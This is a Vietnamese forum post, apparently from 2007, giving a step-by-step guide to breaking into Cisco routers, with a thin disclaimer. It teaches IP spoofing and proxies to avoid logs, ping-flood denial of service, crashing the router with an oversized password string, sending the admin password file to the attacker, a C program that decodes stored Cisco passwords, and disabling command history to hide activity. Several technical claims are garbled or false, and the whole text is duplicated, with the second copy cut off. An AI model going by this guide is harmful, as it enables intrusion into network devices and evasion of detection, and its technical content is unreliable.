chinhanvo
07-24-2007, 05:07 PM
Chú ư:
Chúng tôi không khuyến khích các bạn sử dụng tài liệu để phá hoại hoặc đoạt quyền truy cập bất hợp phát vào hệ thống Cisco.Đây là nhữung hướng dẫn cụ thể, từng bước một để có thể truy cập vào hệ thống của Cisco. Việc sử dụng trái phép có thể sẽ mang lại những rắc rối cho bạn, v́ thế nên cẩn thận trước những hành động của bạn, bài viết này chỉ để học hỏi kinh nghiệm thôi.
Note: Bài hướng dẫn này được víet trên hệ thống Unix, và căn bản th́ chưa được chuyển đổi sang DOS/Windows.Để xem bài viết này bạn cần phải dùng các browser như IE hoặc một tŕnh soạn thảo văn bản tốt như MSWork
--------------------------
Mục lục:
---------------------------
Bắt đầu
-
Một địa chỉ IP là ǵ?
-
Thế nào là một ISP?
-
TCP/IP là ǵ?
-
How to spoof your IP?
-
Làm thế nào để sử dụng Telnet?
-
Làm sao để sử dụng HyperTerminal?
-
Làm sao để sử dụng Ping?
-
Làm sao để sử dụng TraceRoute?
-
Làm sao để sử dụng Proxy Server?
------------------------------------------
-Section 1: Tại sao lại hack một cisco router?
-Section 2: Làm sao để t́m được một cisco router?
-Section 3: Làm sao để xâm nhập vào cisco router?
-Section 4: Làm thế nào để crack được Mật Khẩu?
-Section 5: Làm thế nào để sử dụng cisco router?
------------------------------------------
Bạn cần biết trước khi bắt đầu:
------------------------------------------
Địa chỉ IP là ǵ :
IP được dùng như một nghi thức Internet, những địa chỉ IP được sử dụng bởi các máy tính khác để xác định những máy tính nối tới chúng. Mỗi máy tính có một IP riêng, giống như địa chỉ căn nhà của bạn đó. Những địa chỉ chỉ IP dễ dàng thu được, như những trường hợp sau:
-
Bạn vào một Website, IP của bạn sẽ vẫn c̣n trên Website đó, người quản trị có thể biết IP của bạn.
-
Trên IRC, bất cứ ai cũng có thể có IP của bạn.
-
Trên ICQ, mọi người có thể có IP của bạn, cho dù bạn đặt tùy chọn, “Không hiển thị IP”, nhưng họ vẫn có nó.
-
Nếu bạn đang kết nối với một người nào đó, họ có thể đánh “systat”, và xem ai được nối tới chúng.
-
Nếu một người nào đó gửi cho bạn một e-mail với IP-Java đăng kư, họ cũng có thể có IP của bạn.
Có nhiều cách thu được các IP, bao gồm chương tŕnh backdoor như Sub7 hay NetBus.
----------------------------------------
Thế nào là một ISP :
ISP là viết tắt của Internet Service Provider (Nhà cung cấp dịch vụ Internet). Bạn coi Internet là một xa lộ thông tin, nhưng cần phải có phương tiện để bạn kết nối với Internet, đó chính là ISP, ISP sẽ đưa bạn vào Internet. Bạn kết nối quay số, những người có thể t́m thấy ISP của bạn, đơn giản là chạy một Tracerouter trên bạn ( Tracerouter hả? Về sau sẽ giải thích thêm).
Nó trông như thế này :
tracert 222.222.22.22
Tracing route to [221.223.24.54]
Over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43]<<<ISP của đích 10 101 altavista ms 122 ms 132 ms 221.223.24.54.altavista.com[221.223.24.54]
Trace complete.
-------------------------------------------------
Gói TCP/IP là ǵ :
TCP/IP là viết tắt của Transmission Control Protocol, một gói TCP/IP là một khối dữ liệu đă được nén lại, sau đó nó được gửi tới một máy tính khác. Phần đầu của gói chứa những địa chỉ IP của những máy đă gửi gói đó.Bạn có thể viết lại để nặc danh một ai đó (thay IP của bạn bằng IP người muốn nặc danh).Bạn có thể sử dụng điều đó để đoạt quyền truy cập vào rất nhiều hệ thống. Bạn cần phải dùng Linux hoặc một chương tŕnh nào đó để giúp bạn làm điều này . Bài hướng dẫn này không nói đến về việc sử dụng trên Cisco router, nhưng nó có thể giúp bạn xâm nhập bất cứ hệ thống nào.
------------------------------------------------
How to spoof your IP:
T́m một chương tŕnh như Genius2 hay DC IS, mà bạn chạy được IdentD.Nó sẽ giúp bạn thay đổi sự nhận biết bộ phận máy tính của bạn. Sử dụng điều này khi bạn bị cấm ở chat room IRC nào đó, bạn có thể vào lại ngay.Bạn cũng có thể sử dụng nó lúc muốn truy cập vào một máy tính khác, và bạn sẽ không bị phát hiện khi admin view log (bạn đă giả mạo IP rồi mà ).
------------------------------------------------
Làm thế nào để sử dụng Telnet :
Bạn có thể mở telnet bằng cách đơn giản sau
Bấm vào Start Menu > Run> và gơ telnet
Một lần bạn đă vào Telnet, bạn có thể thay đổi một vài đặc tính. Click vào Terminal>Preference. Ở đây bạn có thể thay đổi kích thước vùng đệm, font và các thứ khác.
Nếu bạn bật chức năng “local echo on” máy của bạn sẽ cho bạn thấy mọi thứ mà bạn gơ vào, và máy tính khác được kế nối sẽ cho bạn thấy câu trả lời
Nếu bạn đánh”hello” và bạn có “hhelelollo”.
Theo mặc định telnet sẽ nối tới hệ thống trên cổng telnet , cổng 23. Bây giờ bạn muốn không luôn luôn nối tới cổng 23, v́ vậy khi kết nối, bạn có thể thay đổi cổng, có thể là 25 chẳng hạn. Hay cổng 21, cho FTP.Có đến hàng ngàn cổng cho nên bạn phải biết chắc là ḿnh đang vào đúng cổng cần thiết.
-----------------------------------------------
Làm sao để sư dụng HyperTerminal :
HyperTerminal cho phép bạn mở một “máy chủ” trên bất cứ cổng nào trên máy tính của bạn, thông tin đầu vào của những máy tính đă được chỉ định rơ. Để sử dụng bạn làm như sau:
Start>Programs>Accessories>Communications>HyperTer minal.
Trước hết bạn lựa chọn kết nối, lựa chọn “TCP/IP Winsock” Bây giờ máy tính khác có thể nối tới máy bạn trên cổng đó (bạn chọn cổng nữa nha), bạn có thể chat hay chuyển hồ sơ.
-----------------------------------------------
Làm sao để sử dụng Ping :
Ping rất dễ, đầu tiên bạn mở MS-DOS và gơ “ping ip.address”, theo mặc định nó sẽ ping 3 lần nhưng bạn có thể gơ “ping ip.address –t” và nó sẽ ping măi măi. Để thay đổi kích thước ping th́ bạn làm như sau:
"ping -l (size) ip.address" .
Công việc của PING là là gửi một gói dữ liệu đến mày tính khác và đo đạt khoảng thời gian nhận được trả lời, từ đó xác định dc tốc độ kết nối …
Ping có thể làm một hệ thống bị chồng chất quá nặng do ping flood(Tuy nhiên nó không thể có tác dụng tuyệt đối khi tấn công vào các server quá mạnh như HVA chẳng hạn).
Một cuộc tấn công ping flood sẽ lấy nhiều bandwidth (băng thông) của bạn, và bạn phải có bandwidth nhiều hơn bandwidth mục tiêu của bạn(trừ phi mục tiêu của bạn dùng windows98 và một modem cỡ trung b́nh th́ bạn sẽ đánh ngă sau một phút ping flood ).
----------------------------------------------
Làm sao để sử dụng TraceRouter :
Để đánh dấu kết nối của bạn (và thấy tất cả các máy tính giữa bạn và mục tiêu) . Bạn mở MS-DOS và gơ “tracert ip.address” và nó có thể cho bạn thấy ISP của một số người
Để xác định dc ISP , bạn hăy xem IP kế cuối , nó thường là của một trong những ISP’s routers.
Về căn bản, tracerouter làm việc như thế nào- một gói TCP/IP có một giá trị trong phần đầu( nó có trong mục IP đó). Nếu bạn không biết những thứ này, rồi lờ nó đi và tiếp tục đọc, mà nó không phải là cái khẩn yếu đó, gọi là TTL.[TIME TO LIVE]
Bất cứ khi nào 1 packet đi qua một router TTL sẽ bị giảm đi 1 đơn vị
Như vậy khi TTL của một gói đạt đến zero nó die và một lỗi ICMP được gửi sau người gửi.
Bây giờ TraceRouter sẽ gửi một gói với giá trị 1 ,và khi packet trở lại, gói sẽ xem địa chỉ của người gửi trong phần đầu của lỗi ICMP. Rồi nó gửi một gói với giá trị TTL2, cái này sẽ tiếp tục cho đến khi gói đến được nơi cần đến của nó.
Now isn't that fun? :-)
------------------------------------------------
Làm sao để sử dụng Proxy Server :
Bạn t́m kiếm trên web cho proxy server chạy trên cổng bạn bạn đă chọn. một lần bạn t́m thấy một cái, và kết nối tới nó hoặc telnet hay HyperTerminal và sau đó kết nối với máy tính khác thông qua proxy server. Dùng cách này máy tính đó sẽ không biết địa chỉ IP của bạn, dùng như thế này cũng để che dấu IP mà.
------------------------------------------------
Section 1: Tại sao lại hack Cisco router?
Có lẽ bạn đang ngạc nhiên…Tại sao lại hack vào trong một cisco router? Lư do là chúng sẽ hữu ích khi bạn hack vào một hệ thống khác.
Những cisco router rất nhanh, vài kết nối 18T1 trên hệ thống và chúng rất linh họat, chúng có thể được sử dụng trong những cuộc tấn công hay nhưng cuộc xâm hập hệ thông khác chạy telnet. Chúng cũng cho phép hàng ngàn nhữung gói đi xuyên qua chúng tại bất cứ thời gian nào Và bạn có thể chôm được và decode có nhiều thông tin thú vị trong đó đấy…. Cisco Routers là những hệ thống được tin cậy, và nó sẽ để cho bạn có những truy cập tới máy tính khác trên mạng của nó.
---------------------------------------------
Section 2:
T́m một Cisco router
T́m một cisco router khá dễ, gần như mỗi ISP sẽ ấn định tuyến đường xuyên qua cisco router. Cách dễ nhất để t́m một cisco router là chạy traceroute từ dos ( kiểu “tracert” và sau đó là địa chỉ IP máy tính của bất cứ ai).
Có lẽ bạn phải làm nhiều lần việc này để t́m thấy 1 cisco, mỗi lần trace bạn sẽ thấy những máy tính nằm giữa máy bạn và máy trace, nếu một trong những máy tính đó có tên chứa “cisco” th́ có lẽ bạn đă t́m được nó
Bây giờ bạn định vị được 1cisco router, nhưng có thể có một firewall bảo vệ (Nếu ping và bạn không dc trả lời th́ có lẽ đă bị firewall). Cách truy nhập vào một số cổng của cisco router, bạn sử dụng đơn giản như dùng telnet vậy. Bạn mở két nối tới router ở cổng 23. Nếu nó hỏi mật khẩu nhưung không hỏi username, bạn ở tại router, nhưng nếu nó muốn cả username, có lẽ bạn đang bị firewall. Bạn hăy cố gắng t́m một router không bị firewall bởi v́ tài liệu này không hướng dẫn cách vượt firewall của cisco ***^_^ hehe đa số đều có firewall tài liệu này hay thật***. Bạn phải chắc chắn t́m thấy một hệ thống tốt, bạn cần phải t́m một proxy server mà sẽ cho phép bạn sử dụng cổng 23, dùng cách này th́ IP của bạn sẽ không bị phát hiện.
---------------------------------------------
Section 3:
Làm thế nào để vào trong được một cisco router
Cisco routers chạy phần mềm v4.1, sẽ dễ dàng vô hiệu hóa. Bạn kết nối tới router trên cổng 23 qua proxy server và nhập vào một chuỗi mật khẩu KHỔNG LỒ
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029384 7465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1 0293847465qpwoeirutyalskdjfhgz
mxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv0 19dsk10293847465qpwoeirutyalsk
djfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzm xncbv019dsk10293847465qpwoeiru
tyalskdjfhgzmxncbv019dsk
Chờ đă, cisco router có thể đă tự khởi động lại, trong trường hợp bạn không thể hack đựoc v́ nó c̣n đang…offline. Trừ khi nó đóng băng trong khỏang 2 đến 10 phút. Bạn có thể tấn công bằng DoS. Bạn hăy ping nó, gơ "ping -l 56550 cisco.router.ip -t".
Trong đó, bạn hăy mở kết nối khác tới đó từ proxy khác và đặt mật khẩu như “admin”. Lư dó là bởi theo mặc định, đây là mật khẩu của router, trong khi nó tạm thời bị vô hiệu hóa, nó sẽ trở lại trang thái mặc định. Nào, bây giờ bạn hăy Đăng nhập vào, bạn hăy lấy file password. Những hệ thống chạy các phần mềm khác nhau, nhưung sẽ có sự nhắc nhở như “htl-textil” hoặc cái ǵ đấy, bây giờ type “?”. Bạn sẽ nh́n thấy một danh sách khổng lồ của các lệnh. Dùng lệnh đó để gửi file password của thằng admin về IP của ḿnh trên cổng 23. Nhưng trước khi làm điều này, bạn hăy thiết lập HyperTeminal để đợi gọi từ cisco router. Nào, bây giờ hăy tiến hành gửi file, HyperTeminal hỏi bạn xem có muốn chấp nhận file mà máy này đang gửi cho bạn, bạn chọn đồng ư, ấn yes và save trên ổ cứng. Thóat.
Bây giờ bạn đă qua được phần khó nhất, bạn hăy sẵn sàng crack mật khẩu đó.
---------------------------------------------
Section 4:
Lấy mật khẩu
Bây giờ bạn đă có trong tay file chứa password, bạn phải phá nó để bạn có thể truy nhập vào router. Bạn phải giải mă nó, bạn cần phần mềm giải mă.
Đây là cách giải mă Mật khẩu của cisco, bạn biên tập đọan mă này trong Linux:
Code:
#include <stdio.h>#include <ctype.h>char xlat[] = {0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44};char pw_str1[] = \"password 7 \";char pw_str2[] = \"enable-password 7 \";char *pname;cdecrypt(enc_pw, dec_pw)char *enc_pw;char *dec_pw;{unsigned int seed, i, val = 0;if(strlen(enc_pw) & 1)return(-1);seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))return(-1);for (i = 2; i <= strlen(enc_pw); i++) {if(i !=2 && !(i & 1)) {dec_pw[i / 2 - 2] = val ^ xlat[seed++];val = 0;}val *= 16;if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {val += enc_pw[i] - '0';continue;}if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {val += enc_pw[i] - 'A' + 10;continue;}if(strlen(enc_pw) != i)return(-1);}dec_pw[++i / 2] = 0;return(0);}usage(){fprintf(stdout, \"Usage: %s -p <encrypted password>n\", pname);fprintf(stdout, \" %s <router config file> <output file>n\",pname);return(0);}main(argc,argv)int argc;char **argv;{FILE *in = stdin, *out = stdout;char line[257];char passwd[65];unsigned int i, pw_pos;pname = argv[0];if(argc > 1){if(argc > 3) {usage();exit(1);}if(argv[1][0] == '-'){switch(argv[1][1]) {case 'h':usage();break;case 'p':if(cdecrypt(argv[2], passwd)) {fprintf(stderr, \"Error.n\");exit(1);}fprintf(stdout, \"password: %sn\", passwd);break;default:fprintf(stderr, \"%s: unknow option.\", pname);}return(0);}if((in = fopen(argv[1], \"rt\")) == NULL)exit(1);if(argc > 2)if((out = fopen(argv[2], \"wt\")) == NULL)exit(1);}while(1) {for(i = 0; i < 256; i++) {if((line[i] = fgetc(in)) == EOF) {if(i)break;fclose(in);fclose(out);return(0);}if(l ine[i] == 'r')i--;if(line[i] == 'n')break;}pw_pos = 0;line[i] = 0;if(!strncmp(line, pw_str1, strlen(pw_str1)))pw_pos = strlen(pw_str1);if(!strncmp(line, pw_str2, strlen(pw_str2)))pw_pos = strlen(pw_str2);if(!pw_pos) {fprintf(stdout, \"%sn\", line);continue;}if(cdecrypt(&line[pw_pos], passwd)) {fprintf(stderr, \"Error.n\");exit(1);}else {if(pw_pos == strlen(pw_str1))fprintf(out, \"%s\", pw_str1);elsefprintf(out, \"%s\", pw_str2);fprintf(out, \"%sn\", passwd);}}}
Nếu bạn không có Linux, cách duy nhất để crack mật khẩu là chạy một từ điển hay tấn công lên file password với John hay password-cracker khác. Pó tay.
-------------------------------------------------
Section 5:
Sử dụng cisco router
Để sử dụng công nghệ kư diệu này, bạn hăy kết nối tới nó, sử dụng proxy nếu bạn không muốn IP của bạn bị phát hiện. Một lần bạn Đăng nhập, bạn muốn tắt History để không muốn ai có thể biết bạn làm ǵ, bạn hăy gơ ”terminal history size 0” .Bây giờ nó sẽ không nhớ bất cứ cái ǵ hết trơn ah. Gơ “?” sẽ hiện ra danh sách các lệnh của router và bạn có thể sử dụng hầu hết các lệnh đó. Những router này thường có telnet, như vậy bạn có thể dụng telnet để nối tới những hệ thống khác (như Unix) và hack chúng luôn thể. Nó cũng được trang bị với ping bà traceroute. Bạn có thể sử dụng hệ thống trace hay những cuộc tấn công bằng DoS. Bạn có thể dùng chúng để chặn những gói dữ liệu, nhưng tôi không giới thiệu điều này, trong khi nó sẽ không luôn luôn là việc, nó sẽ làm bạn phải chú ư…
[Only Registered And Activated Users Can See Links] ([Only Registered And Activated Users Can See Links])
Chúng tôi không khuyến khích các bạn sử dụng tài liệu để phá hoại hoặc đoạt quyền truy cập bất hợp phát vào hệ thống Cisco.Đây là nhữung hướng dẫn cụ thể, từng bước một để có thể truy cập vào hệ thống của Cisco. Việc sử dụng trái phép có thể sẽ mang lại những rắc rối cho bạn, v́ thế nên cẩn thận trước những hành động của bạn, bài viết này chỉ để học hỏi kinh nghiệm thôi.
Note: Bài hướng dẫn này được víet trên hệ thống Unix, và căn bản th́ chưa được chuyển đổi sang DOS/Windows.Để xem bài viết này bạn cần phải dùng các browser như IE hoặc một tŕnh soạn thảo văn bản tốt như MSWork
--------------------------
Mục lục:
---------------------------
Bắt đầu
-
Một địa chỉ IP là ǵ?
-
Thế nào là một ISP?
-
TCP/IP là ǵ?
-
How to spoof your IP?
-
Làm thế nào để sử dụng Telnet?
-
Làm sao để sử dụng HyperTerminal?
-
Làm sao để sử dụng Ping?
-
Làm sao để sử dụng TraceRoute?
-
Làm sao để sử dụng Proxy Server?
------------------------------------------
-Section 1: Tại sao lại hack một cisco router?
-Section 2: Làm sao để t́m được một cisco router?
-Section 3: Làm sao để xâm nhập vào cisco router?
-Section 4: Làm thế nào để crack được Mật Khẩu?
-Section 5: Làm thế nào để sử dụng cisco router?
------------------------------------------
Bạn cần biết trước khi bắt đầu:
------------------------------------------
Địa chỉ IP là ǵ :
IP được dùng như một nghi thức Internet, những địa chỉ IP được sử dụng bởi các máy tính khác để xác định những máy tính nối tới chúng. Mỗi máy tính có một IP riêng, giống như địa chỉ căn nhà của bạn đó. Những địa chỉ chỉ IP dễ dàng thu được, như những trường hợp sau:
-
Bạn vào một Website, IP của bạn sẽ vẫn c̣n trên Website đó, người quản trị có thể biết IP của bạn.
-
Trên IRC, bất cứ ai cũng có thể có IP của bạn.
-
Trên ICQ, mọi người có thể có IP của bạn, cho dù bạn đặt tùy chọn, “Không hiển thị IP”, nhưng họ vẫn có nó.
-
Nếu bạn đang kết nối với một người nào đó, họ có thể đánh “systat”, và xem ai được nối tới chúng.
-
Nếu một người nào đó gửi cho bạn một e-mail với IP-Java đăng kư, họ cũng có thể có IP của bạn.
Có nhiều cách thu được các IP, bao gồm chương tŕnh backdoor như Sub7 hay NetBus.
----------------------------------------
Thế nào là một ISP :
ISP là viết tắt của Internet Service Provider (Nhà cung cấp dịch vụ Internet). Bạn coi Internet là một xa lộ thông tin, nhưng cần phải có phương tiện để bạn kết nối với Internet, đó chính là ISP, ISP sẽ đưa bạn vào Internet. Bạn kết nối quay số, những người có thể t́m thấy ISP của bạn, đơn giản là chạy một Tracerouter trên bạn ( Tracerouter hả? Về sau sẽ giải thích thêm).
Nó trông như thế này :
tracert 222.222.22.22
Tracing route to [221.223.24.54]
Over a maximum of 30 hops.
1 147ms 122ms 132ms your.isp [222.222.22.21]
2 122ms 143ms 123ms isp.firewall [222.222.22.20]
3 156ms 142MS 122ms aol.com [207.22.44.33]
4 * * * Request timed out
5 101ms 102ms 133ms cisco.router [194.33.44.33]
6 233ms 143ms 102ms something.ip [111.11.11.11]
7 222ms 123ms 213ms netcom.com [122.11.21.21]
8 152ms 211ms 212ms blahblah.tts.net [121.21.21.33]
9 122ms 223ms 243ms altavista.34.com [121.22.32.43]<<<ISP của đích 10 101 altavista ms 122 ms 132 ms 221.223.24.54.altavista.com[221.223.24.54]
Trace complete.
-------------------------------------------------
Gói TCP/IP là ǵ :
TCP/IP là viết tắt của Transmission Control Protocol, một gói TCP/IP là một khối dữ liệu đă được nén lại, sau đó nó được gửi tới một máy tính khác. Phần đầu của gói chứa những địa chỉ IP của những máy đă gửi gói đó.Bạn có thể viết lại để nặc danh một ai đó (thay IP của bạn bằng IP người muốn nặc danh).Bạn có thể sử dụng điều đó để đoạt quyền truy cập vào rất nhiều hệ thống. Bạn cần phải dùng Linux hoặc một chương tŕnh nào đó để giúp bạn làm điều này . Bài hướng dẫn này không nói đến về việc sử dụng trên Cisco router, nhưng nó có thể giúp bạn xâm nhập bất cứ hệ thống nào.
------------------------------------------------
How to spoof your IP:
T́m một chương tŕnh như Genius2 hay DC IS, mà bạn chạy được IdentD.Nó sẽ giúp bạn thay đổi sự nhận biết bộ phận máy tính của bạn. Sử dụng điều này khi bạn bị cấm ở chat room IRC nào đó, bạn có thể vào lại ngay.Bạn cũng có thể sử dụng nó lúc muốn truy cập vào một máy tính khác, và bạn sẽ không bị phát hiện khi admin view log (bạn đă giả mạo IP rồi mà ).
------------------------------------------------
Làm thế nào để sử dụng Telnet :
Bạn có thể mở telnet bằng cách đơn giản sau
Bấm vào Start Menu > Run> và gơ telnet
Một lần bạn đă vào Telnet, bạn có thể thay đổi một vài đặc tính. Click vào Terminal>Preference. Ở đây bạn có thể thay đổi kích thước vùng đệm, font và các thứ khác.
Nếu bạn bật chức năng “local echo on” máy của bạn sẽ cho bạn thấy mọi thứ mà bạn gơ vào, và máy tính khác được kế nối sẽ cho bạn thấy câu trả lời
Nếu bạn đánh”hello” và bạn có “hhelelollo”.
Theo mặc định telnet sẽ nối tới hệ thống trên cổng telnet , cổng 23. Bây giờ bạn muốn không luôn luôn nối tới cổng 23, v́ vậy khi kết nối, bạn có thể thay đổi cổng, có thể là 25 chẳng hạn. Hay cổng 21, cho FTP.Có đến hàng ngàn cổng cho nên bạn phải biết chắc là ḿnh đang vào đúng cổng cần thiết.
-----------------------------------------------
Làm sao để sư dụng HyperTerminal :
HyperTerminal cho phép bạn mở một “máy chủ” trên bất cứ cổng nào trên máy tính của bạn, thông tin đầu vào của những máy tính đă được chỉ định rơ. Để sử dụng bạn làm như sau:
Start>Programs>Accessories>Communications>HyperTer minal.
Trước hết bạn lựa chọn kết nối, lựa chọn “TCP/IP Winsock” Bây giờ máy tính khác có thể nối tới máy bạn trên cổng đó (bạn chọn cổng nữa nha), bạn có thể chat hay chuyển hồ sơ.
-----------------------------------------------
Làm sao để sử dụng Ping :
Ping rất dễ, đầu tiên bạn mở MS-DOS và gơ “ping ip.address”, theo mặc định nó sẽ ping 3 lần nhưng bạn có thể gơ “ping ip.address –t” và nó sẽ ping măi măi. Để thay đổi kích thước ping th́ bạn làm như sau:
"ping -l (size) ip.address" .
Công việc của PING là là gửi một gói dữ liệu đến mày tính khác và đo đạt khoảng thời gian nhận được trả lời, từ đó xác định dc tốc độ kết nối …
Ping có thể làm một hệ thống bị chồng chất quá nặng do ping flood(Tuy nhiên nó không thể có tác dụng tuyệt đối khi tấn công vào các server quá mạnh như HVA chẳng hạn).
Một cuộc tấn công ping flood sẽ lấy nhiều bandwidth (băng thông) của bạn, và bạn phải có bandwidth nhiều hơn bandwidth mục tiêu của bạn(trừ phi mục tiêu của bạn dùng windows98 và một modem cỡ trung b́nh th́ bạn sẽ đánh ngă sau một phút ping flood ).
----------------------------------------------
Làm sao để sử dụng TraceRouter :
Để đánh dấu kết nối của bạn (và thấy tất cả các máy tính giữa bạn và mục tiêu) . Bạn mở MS-DOS và gơ “tracert ip.address” và nó có thể cho bạn thấy ISP của một số người
Để xác định dc ISP , bạn hăy xem IP kế cuối , nó thường là của một trong những ISP’s routers.
Về căn bản, tracerouter làm việc như thế nào- một gói TCP/IP có một giá trị trong phần đầu( nó có trong mục IP đó). Nếu bạn không biết những thứ này, rồi lờ nó đi và tiếp tục đọc, mà nó không phải là cái khẩn yếu đó, gọi là TTL.[TIME TO LIVE]
Bất cứ khi nào 1 packet đi qua một router TTL sẽ bị giảm đi 1 đơn vị
Như vậy khi TTL của một gói đạt đến zero nó die và một lỗi ICMP được gửi sau người gửi.
Bây giờ TraceRouter sẽ gửi một gói với giá trị 1 ,và khi packet trở lại, gói sẽ xem địa chỉ của người gửi trong phần đầu của lỗi ICMP. Rồi nó gửi một gói với giá trị TTL2, cái này sẽ tiếp tục cho đến khi gói đến được nơi cần đến của nó.
Now isn't that fun? :-)
------------------------------------------------
Làm sao để sử dụng Proxy Server :
Bạn t́m kiếm trên web cho proxy server chạy trên cổng bạn bạn đă chọn. một lần bạn t́m thấy một cái, và kết nối tới nó hoặc telnet hay HyperTerminal và sau đó kết nối với máy tính khác thông qua proxy server. Dùng cách này máy tính đó sẽ không biết địa chỉ IP của bạn, dùng như thế này cũng để che dấu IP mà.
------------------------------------------------
Section 1: Tại sao lại hack Cisco router?
Có lẽ bạn đang ngạc nhiên…Tại sao lại hack vào trong một cisco router? Lư do là chúng sẽ hữu ích khi bạn hack vào một hệ thống khác.
Những cisco router rất nhanh, vài kết nối 18T1 trên hệ thống và chúng rất linh họat, chúng có thể được sử dụng trong những cuộc tấn công hay nhưng cuộc xâm hập hệ thông khác chạy telnet. Chúng cũng cho phép hàng ngàn nhữung gói đi xuyên qua chúng tại bất cứ thời gian nào Và bạn có thể chôm được và decode có nhiều thông tin thú vị trong đó đấy…. Cisco Routers là những hệ thống được tin cậy, và nó sẽ để cho bạn có những truy cập tới máy tính khác trên mạng của nó.
---------------------------------------------
Section 2:
T́m một Cisco router
T́m một cisco router khá dễ, gần như mỗi ISP sẽ ấn định tuyến đường xuyên qua cisco router. Cách dễ nhất để t́m một cisco router là chạy traceroute từ dos ( kiểu “tracert” và sau đó là địa chỉ IP máy tính của bất cứ ai).
Có lẽ bạn phải làm nhiều lần việc này để t́m thấy 1 cisco, mỗi lần trace bạn sẽ thấy những máy tính nằm giữa máy bạn và máy trace, nếu một trong những máy tính đó có tên chứa “cisco” th́ có lẽ bạn đă t́m được nó
Bây giờ bạn định vị được 1cisco router, nhưng có thể có một firewall bảo vệ (Nếu ping và bạn không dc trả lời th́ có lẽ đă bị firewall). Cách truy nhập vào một số cổng của cisco router, bạn sử dụng đơn giản như dùng telnet vậy. Bạn mở két nối tới router ở cổng 23. Nếu nó hỏi mật khẩu nhưung không hỏi username, bạn ở tại router, nhưng nếu nó muốn cả username, có lẽ bạn đang bị firewall. Bạn hăy cố gắng t́m một router không bị firewall bởi v́ tài liệu này không hướng dẫn cách vượt firewall của cisco ***^_^ hehe đa số đều có firewall tài liệu này hay thật***. Bạn phải chắc chắn t́m thấy một hệ thống tốt, bạn cần phải t́m một proxy server mà sẽ cho phép bạn sử dụng cổng 23, dùng cách này th́ IP của bạn sẽ không bị phát hiện.
---------------------------------------------
Section 3:
Làm thế nào để vào trong được một cisco router
Cisco routers chạy phần mềm v4.1, sẽ dễ dàng vô hiệu hóa. Bạn kết nối tới router trên cổng 23 qua proxy server và nhập vào một chuỗi mật khẩu KHỔNG LỒ
10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1029384 7465qpwoeirutyalskdjfhgzmxncbv
019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk1 0293847465qpwoeirutyalskdjfhgz
mxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv0 19dsk10293847465qpwoeirutyalsk
djfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzm xncbv019dsk10293847465qpwoeiru
tyalskdjfhgzmxncbv019dsk
Chờ đă, cisco router có thể đă tự khởi động lại, trong trường hợp bạn không thể hack đựoc v́ nó c̣n đang…offline. Trừ khi nó đóng băng trong khỏang 2 đến 10 phút. Bạn có thể tấn công bằng DoS. Bạn hăy ping nó, gơ "ping -l 56550 cisco.router.ip -t".
Trong đó, bạn hăy mở kết nối khác tới đó từ proxy khác và đặt mật khẩu như “admin”. Lư dó là bởi theo mặc định, đây là mật khẩu của router, trong khi nó tạm thời bị vô hiệu hóa, nó sẽ trở lại trang thái mặc định. Nào, bây giờ bạn hăy Đăng nhập vào, bạn hăy lấy file password. Những hệ thống chạy các phần mềm khác nhau, nhưung sẽ có sự nhắc nhở như “htl-textil” hoặc cái ǵ đấy, bây giờ type “?”. Bạn sẽ nh́n thấy một danh sách khổng lồ của các lệnh. Dùng lệnh đó để gửi file password của thằng admin về IP của ḿnh trên cổng 23. Nhưng trước khi làm điều này, bạn hăy thiết lập HyperTeminal để đợi gọi từ cisco router. Nào, bây giờ hăy tiến hành gửi file, HyperTeminal hỏi bạn xem có muốn chấp nhận file mà máy này đang gửi cho bạn, bạn chọn đồng ư, ấn yes và save trên ổ cứng. Thóat.
Bây giờ bạn đă qua được phần khó nhất, bạn hăy sẵn sàng crack mật khẩu đó.
---------------------------------------------
Section 4:
Lấy mật khẩu
Bây giờ bạn đă có trong tay file chứa password, bạn phải phá nó để bạn có thể truy nhập vào router. Bạn phải giải mă nó, bạn cần phần mềm giải mă.
Đây là cách giải mă Mật khẩu của cisco, bạn biên tập đọan mă này trong Linux:
Code:
